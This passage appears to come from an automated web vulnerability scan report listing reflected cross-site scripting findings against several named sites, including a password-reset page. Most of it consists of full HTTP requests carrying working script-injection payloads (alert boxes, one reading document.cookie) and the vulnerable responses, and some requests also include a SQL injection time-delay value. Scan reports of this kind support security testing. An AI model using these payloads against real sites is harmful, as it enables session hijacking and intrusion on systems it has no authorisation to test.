GET /search/web19465%3Cimg%20src%3da%20onerror%3dalert(1)%3E7fccbdccd2f35e2f<img%20src%3da%20onerror%3dalert(1)>68babb1224f/a HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/web19465%3Cimg%20src%3da%20onerror%3dalert(1)%3E7fccbdccd2f/Linkbucks%20vlad%20modelS
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=129279958.1304823358.2.2.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/search/web19465%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E7fccbdccd2f/Linkbucks%20vlad%20modelS; __utma=129279958.1180364951.1304737441.1304737441.1304823358.2; __utmc=129279958; __utmb=129279958.3.10.1304823358

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 21:56:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2161

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<img src=a onerror=alert(1)>7fccbdccd2f35e2f<img src=a onerror=alert(1)>68babb1224f</strong>
...[SNIP]...

5.78. http://kroogy.com/search/web19465%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E7fccbdccd2f/a [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/web19465%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E7fccbdccd2f/a

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 62284<img%20src%3da%20onerror%3dalert(1)>24266b354e9 was submitted in the REST URL parameter 1. This input was echoed as 62284<img src=a onerror=alert(1)>24266b354e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search62284<img%20src%3da%20onerror%3dalert(1)>24266b354e9/web19465%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E7fccbdccd2f/a HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/web19465%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E7fccbdccd2f/Linkbucks%20vlad%20modelS
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=129279958.1304737441.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129279958.1180364951.1304737441.1304737441.1304737441.1

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 21:55:31 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2129

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Search62284<img src=a onerror=alert(1)>24266b354e9Controller</strong>
...[SNIP]...

5.79. http://kroogy.com/search/web19465%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E7fccbdccd2f/a [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/web19465%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E7fccbdccd2f/a

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e832b<img%20src%3da%20onerror%3dalert(1)>2c7b2edd88e was submitted in the REST URL parameter 2. This input was echoed as e832b<img src=a onerror=alert(1)>2c7b2edd88e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/web19465%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E7fccbdccd2fe832b<img%20src%3da%20onerror%3dalert(1)>2c7b2edd88e/a HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/web19465%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E7fccbdccd2f/Linkbucks%20vlad%20modelS
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=129279958.1304737441.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129279958.1180364951.1304737441.1304737441.1304737441.1

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 21:55:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2175

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<img src=a onerror=alert(document.cookie)>7fccbdccd2fe832b<img src=a onerror=alert(1)>2c7b2edd88e</strong>
...[SNIP]...

5.80. http://kroogy.com/searchc3d36%3Cimg%20src%3da%20onerror%3dalert(1)%3E1f123855a7/web/a [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /searchc3d36%3Cimg%20src%3da%20onerror%3dalert(1)%3E1f123855a7/web/a

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3addd<img%20src%3da%20onerror%3dalert(1)>060739d97c0 was submitted in the REST URL parameter 1. This input was echoed as 3addd<img src=a onerror=alert(1)>060739d97c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /searchc3d36%3Cimg%20src%3da%20onerror%3dalert(1)%3E1f123855a73addd<img%20src%3da%20onerror%3dalert(1)>060739d97c0/web/a HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/searchc3d36%3Cimg%20src%3da%20onerror%3dalert(1)%3E1f123855a7/web/Linkbucks%20vlad%20modelS
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=129279958.1304823358.2.2.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/search/web19465%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E7fccbdccd2f/Linkbucks%20vlad%20modelS; __utma=129279958.1180364951.1304737441.1304737441.1304823358.2; __utmc=129279958; __utmb=129279958.1.10.1304823358

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 21:55:58 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2172

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<img src=a onerror=alert(1)>1f123855a73addd<img src=a onerror=alert(1)>060739d97c0Controller</strong>
...[SNIP]...

5.81. http://learn.bridgefront.com/sendpassword [button1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn.bridgefront.com
Path:   /sendpassword

Issue detail

The value of the button1 request parameter is copied into the HTML document as plain text between tags. The payload f7917<script>alert(1)</script>a6e02e7e600 was submitted in the button1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sendpassword?button1=Get+Passwordf7917<script>alert(1)</script>a6e02e7e600&button2=Get+User+Name&forgetbrand=null&forwardpage=login.jsp&replace0_ul_=%27%3BSELECT%20pg_sleep(25)--&replace1_ul_=3&totalvalues=3 HTTP/1.1
Host: learn.bridgefront.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199010044.1303780600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=199010044.1310163297.1303780600.1303780600.1303780600.1

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 06 May 2011 22:09:30 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: JSESSIONID=AD543B39B2162043DABD3434006F7DBE; Path=/
Content-Length: 6471
Connection: close
Content-Type: text/html; charset=UTF-8


<html>
<head><title>Application Error </title>

<script language="JavaScript" type="text/JavaScript">

   function showdiv2(param)
   {
    if(param=="show")
    {
    document.all.div1.style.visi
...[SNIP]...
<b>
SERVER NAME: learn.bridgefront.com

SERVER PORT: 80

REMOTE HOST: 173.193.214.243

EXCEPTION: java.lang.NullPointerException

JSP REQUESTED: /errorpage.jsp?button1=Get+Passwordf7917<script>alert(1)</script>a6e02e7e600&button2=Get+User+Name&forgetbrand=null&forwardpage=login.jsp&replace0_ul_=%27%3BSELECT%20pg_sleep(25)--&replace1_ul_=3&totalvalues=3


<table border="0">
...[SNIP]...

5.82. http://learn.bridgefront.com/sendpassword [button2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn.bridgefront.com
Path:   /sendpassword

Issue detail

The value of the button2 request parameter is copied into the HTML document as plain text between tags. The payload f1d32<script>alert(1)</script>81b609eefc9 was submitted in the button2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sendpassword?button1=Get+Password&button2=Get+User+Namef1d32<script>alert(1)</script>81b609eefc9&forgetbrand=null&forwardpage=login.jsp&replace0_ul_=%27%3BSELECT%20pg_sleep(25)--&replace1_ul_=3&totalvalues=3 HTTP/1.1
Host: learn.bridgefront.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199010044.1303780600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=199010044.1310163297.1303780600.1303780600.1303780600.1

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 06 May 2011 22:20:26 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: JSESSIONID=1A39AB27A0B048AF89C51833109C8048; Path=/
Content-Length: 6471
Connection: close
Content-Type: text/html; charset=UTF-8


<html>
<head><title>Application Error </title>

<script language="JavaScript" type="text/JavaScript">

   function showdiv2(param)
   {
    if(param=="show")
    {
    document.all.div1.style.visi
...[SNIP]...
>
SERVER NAME: learn.bridgefront.com

SERVER PORT: 80

REMOTE HOST: 173.193.214.243

EXCEPTION: java.lang.NullPointerException

JSP REQUESTED: /errorpage.jsp?button1=Get+Password&button2=Get+User+Namef1d32<script>alert(1)</script>81b609eefc9&forgetbrand=null&forwardpage=login.jsp&replace0_ul_=%27%3BSELECT%20pg_sleep(25)--&replace1_ul_=3&totalvalues=3


<table border="0">
...[SNIP]...

5.83. http://learn.bridgefront.com/sendpassword [forgetbrand parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn.bridgefront.com
Path:   /sendpassword

Issue detail

The value of the forgetbrand request parameter is copied into the HTML document as plain text between tags. The payload e9121<script>alert(1)</script>f3274d52418 was submitted in the forgetbrand parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sendpassword?button1=Get+Password&button2=Get+User+Name&forgetbrand=nulle9121<script>alert(1)</script>f3274d52418&forwardpage=login.jsp&replace0_ul_=%27%3BSELECT%20pg_sleep(25)--&replace1_ul_=3&totalvalues=3 HTTP/1.1
Host: learn.bridgefront.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199010044.1303780600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=199010044.1310163297.1303780600.1303780600.1303780600.1

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 06 May 2011 22:31:21 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: JSESSIONID=9695723B5707A0A14E3F1D2C5FCE2A02; Path=/
Content-Length: 6471
Connection: close
Content-Type: text/html; charset=UTF-8


<html>
<head><title>Application Error </title>

<script language="JavaScript" type="text/JavaScript">

   function showdiv2(param)
   {
    if(param=="show")
    {
    document.all.div1.style.visi
...[SNIP]...
earn.bridgefront.com

SERVER PORT: 80

REMOTE HOST: 173.193.214.243

EXCEPTION: java.lang.NullPointerException

JSP REQUESTED: /errorpage.jsp?button1=Get+Password&button2=Get+User+Name&forgetbrand=nulle9121<script>alert(1)</script>f3274d52418&forwardpage=login.jsp&replace0_ul_=%27%3BSELECT%20pg_sleep(25)--&replace1_ul_=3&totalvalues=3


<table border="0">
...[SNIP]...

5.84. http://learn.bridgefront.com/sendpassword [forwardpage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn.bridgefront.com
Path:   /sendpassword

Issue detail

The value of the forwardpage request parameter is copied into the HTML document as plain text between tags. The payload 43a96<script>alert(1)</script>7664851d448 was submitted in the forwardpage parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sendpassword?button1=Get+Password&button2=Get+User+Name&forgetbrand=null&forwardpage=login.jsp43a96<script>alert(1)</script>7664851d448&replace0_ul_=%27%3BSELECT%20pg_sleep(25)--&replace1_ul_=3&totalvalues=3 HTTP/1.1
Host: learn.bridgefront.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199010044.1303780600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=199010044.1310163297.1303780600.1303780600.1303780600.1

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 06 May 2011 22:45:38 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: JSESSIONID=B2D8F44A4079D6989583448FA8EBFCD9; Path=/
Content-Length: 6471
Connection: close
Content-Type: text/html; charset=UTF-8


<html>
<head><title>Application Error </title>

<script language="JavaScript" type="text/JavaScript">

   function showdiv2(param)
   {
    if(param=="show")
    {
    document.all.div1.style.visi
...[SNIP]...
SERVER PORT: 80

REMOTE HOST: 173.193.214.243

EXCEPTION: java.lang.NullPointerException

JSP REQUESTED: /errorpage.jsp?button1=Get+Password&button2=Get+User+Name&forgetbrand=null&forwardpage=login.jsp43a96<script>alert(1)</script>7664851d448&replace0_ul_=%27%3BSELECT%20pg_sleep(25)--&replace1_ul_=3&totalvalues=3


<table border="0">
...[SNIP]...

5.85. http://learn.bridgefront.com/sendpassword [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn.bridgefront.com
Path:   /sendpassword

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5f2cc<script>alert(1)</script>b056eb85e91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sendpassword?button1=Get+Password&button2=Get+User+Name&forgetbrand=null&forwardpage=login.jsp&replace0_ul_=%27%3BSELECT%20pg_sleep(25)--&replace1_ul_=3&totalvalues=3&5f2cc<script>alert(1)</script>b056eb85e91=1 HTTP/1.1
Host: learn.bridgefront.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199010044.1303780600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=199010044.1310163297.1303780600.1303780600.1303780600.1

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 06 May 2011 23:38:04 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: JSESSIONID=4857F165EACF9C1A4E3140B4CD6C7B6B; Path=/
Content-Length: 6474
Connection: close
Content-Type: text/html; charset=UTF-8


<html>
<head><title>Application Error </title>

<script language="JavaScript" type="text/JavaScript">

   function showdiv2(param)
   {
    if(param=="show")
    {
    document.all.div1.style.visi
...[SNIP]...
ointerException

JSP REQUESTED: /errorpage.jsp?button1=Get+Password&button2=Get+User+Name&forgetbrand=null&forwardpage=login.jsp&replace0_ul_=%27%3BSELECT%20pg_sleep(25)--&replace1_ul_=3&totalvalues=3&5f2cc<script>alert(1)</script>b056eb85e91=1


<table border="0">
...[SNIP]...

5.86. http://learn.bridgefront.com/sendpassword [replace0_ul_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn.bridgefront.com
Path:   /sendpassword

Issue detail

The value of the replace0_ul_ request parameter is copied into the HTML document as plain text between tags. The payload 6728f<script>alert(1)</script>cb43f085596 was submitted in the replace0_ul_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sendpassword?button1=Get+Password&button2=Get+User+Name&forgetbrand=null&forwardpage=login.jsp&replace0_ul_=%27%3BSELECT%20pg_sleep(25)--6728f<script>alert(1)</script>cb43f085596&replace1_ul_=3&totalvalues=3 HTTP/1.1
Host: learn.bridgefront.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199010044.1303780600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=199010044.1310163297.1303780600.1303780600.1303780600.1

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 06 May 2011 22:59:54 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: JSESSIONID=EBDDE581391985FB7AFB4871D64D33CB; Path=/
Content-Length: 6471
Connection: close
Content-Type: text/html; charset=UTF-8


<html>
<head><title>Application Error </title>

<script language="JavaScript" type="text/JavaScript">

   function showdiv2(param)
   {
    if(param=="show")
    {
    document.all.div1.style.visi
...[SNIP]...
43

EXCEPTION: java.lang.NullPointerException

JSP REQUESTED: /errorpage.jsp?button1=Get+Password&button2=Get+User+Name&forgetbrand=null&forwardpage=login.jsp&replace0_ul_=%27%3BSELECT%20pg_sleep(25)--6728f<script>alert(1)</script>cb43f085596&replace1_ul_=3&totalvalues=3


<table border="0">
...[SNIP]...

5.87. http://learn.bridgefront.com/sendpassword [replace1_ul_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn.bridgefront.com
Path:   /sendpassword

Issue detail

The value of the replace1_ul_ request parameter is copied into the HTML document as plain text between tags. The payload 4364a<script>alert(1)</script>7b5aaa36f8a was submitted in the replace1_ul_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sendpassword?button1=Get+Password&button2=Get+User+Name&forgetbrand=null&forwardpage=login.jsp&replace0_ul_=%27%3BSELECT%20pg_sleep(25)--&replace1_ul_=34364a<script>alert(1)</script>7b5aaa36f8a&totalvalues=3 HTTP/1.1
Host: learn.bridgefront.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199010044.1303780600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=199010044.1310163297.1303780600.1303780600.1303780600.1

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 06 May 2011 23:08:42 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: JSESSIONID=60C3DEE51835B2637DD8623D228E3CF7; Path=/
Content-Length: 6471
Connection: close
Content-Type: text/html; charset=UTF-8


<html>
<head><title>Application Error </title>

<script language="JavaScript" type="text/JavaScript">

   function showdiv2(param)
   {
    if(param=="show")
    {
    document.all.div1.style.visi
...[SNIP]...
java.lang.NullPointerException

JSP REQUESTED: /errorpage.jsp?button1=Get+Password&button2=Get+User+Name&forgetbrand=null&forwardpage=login.jsp&replace0_ul_=%27%3BSELECT%20pg_sleep(25)--&replace1_ul_=34364a<script>alert(1)</script>7b5aaa36f8a&totalvalues=3


<table border="0">
...[SNIP]...

5.88. http://learn.bridgefront.com/sendpassword [totalvalues parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn.bridgefront.com
Path:   /sendpassword

Issue detail

The value of the totalvalues request parameter is copied into the HTML document as plain text between tags. The payload cf847<script>alert(1)</script>aac6a0e8002 was submitted in the totalvalues parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sendpassword?button1=Get+Password&button2=Get+User+Name&forgetbrand=null&forwardpage=login.jsp&replace0_ul_=%27%3BSELECT%20pg_sleep(25)--&replace1_ul_=3&totalvalues=3cf847<script>alert(1)</script>aac6a0e8002 HTTP/1.1
Host: learn.bridgefront.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199010044.1303780600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=199010044.1310163297.1303780600.1303780600.1303780600.1

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 06 May 2011 23:23:23 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: JSESSIONID=D667D7ACE515F68FAD80C1A183A8E4FD; Path=/
Content-Length: 6471
Connection: close
Content-Type: text/html; charset=UTF-8


<html>
<head><title>Application Error </title>

<script language="JavaScript" type="text/JavaScript">

   function showdiv2(param)
   {
    if(param=="show")
    {
    document.all.div1.style.visi
...[SNIP]...
PointerException

JSP REQUESTED: /errorpage.jsp?button1=Get+Password&button2=Get+User+Name&forgetbrand=null&forwardpage=login.jsp&replace0_ul_=%27%3BSELECT%20pg_sleep(25)--&replace1_ul_=3&totalvalues=3cf847<script>alert(1)</script>aac6a0e8002


<table border="0">
...[SNIP]...

5.89. http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp [message parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://login.vindicosuite.com
Path:   /AccountManager/ResetPassword/index.asp

Issue detail

The value of the message request parameter is copied into the HTML document as plain text between tags. The payload ecadb<script>alert(1)</script>6684c5b90cb640ea3 was submitted in the message parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /AccountManager/ResetPassword/index.asp?message=Invalid%20Username%20/%20Passwordecadb<script>alert(1)</script>6684c5b90cb640ea3&username=&existingPassword=&newPassword= HTTP/1.1
Referer: http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp?message=Invalid%20Username%20/%20Password
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: login.vindicosuite.com
Cookie: ASPSESSIONIDSSSCTDAT=MBNPJKACNAJKJFBPLELMNGGF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 3707
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 17:20:55 GMT


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<!--
edited by Tim Whidden Today is 1/13/11. It is now 9:23 AM
-->
<head>
   <title>Password Reset</title>
   
   <script type="text
...[SNIP]...
<div class='divMessage'>Invalid Username / Passwordecadb<script>alert(1)</script>6684c5b90cb640ea3</div>
...[SNIP]...

5.90. http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp [message parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://login.vindicosuite.com
Path:   /AccountManager/ResetPassword/index.asp

Issue detail

The value of the message request parameter is copied into the HTML document as plain text between tags. The payload 6c34d<script>alert(1)</script>032f27b5100 was submitted in the message parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /AccountManager/ResetPassword/index.asp?message=Invalid%20Username%20/%20Password6c34d<script>alert(1)</script>032f27b5100 HTTP/1.1
Host: login.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSSSCTDAT=ANMPJKACDGDFKLLGFIHDPGOP

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 3701
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 17:19:36 GMT


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<!--
edited by Tim Whidden Today is 1/13/11. It is now 9:23 AM
-->
<head>
   <title>Password Reset</title>
   
   <script type="text
...[SNIP]...
<div class='divMessage'>Invalid Username / Password6c34d<script>alert(1)</script>032f27b5100</div>
...[SNIP]...

5.91. http://login.vindicosuite.com/default.asp [message parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://login.vindicosuite.com
Path:   /default.asp

Issue detail

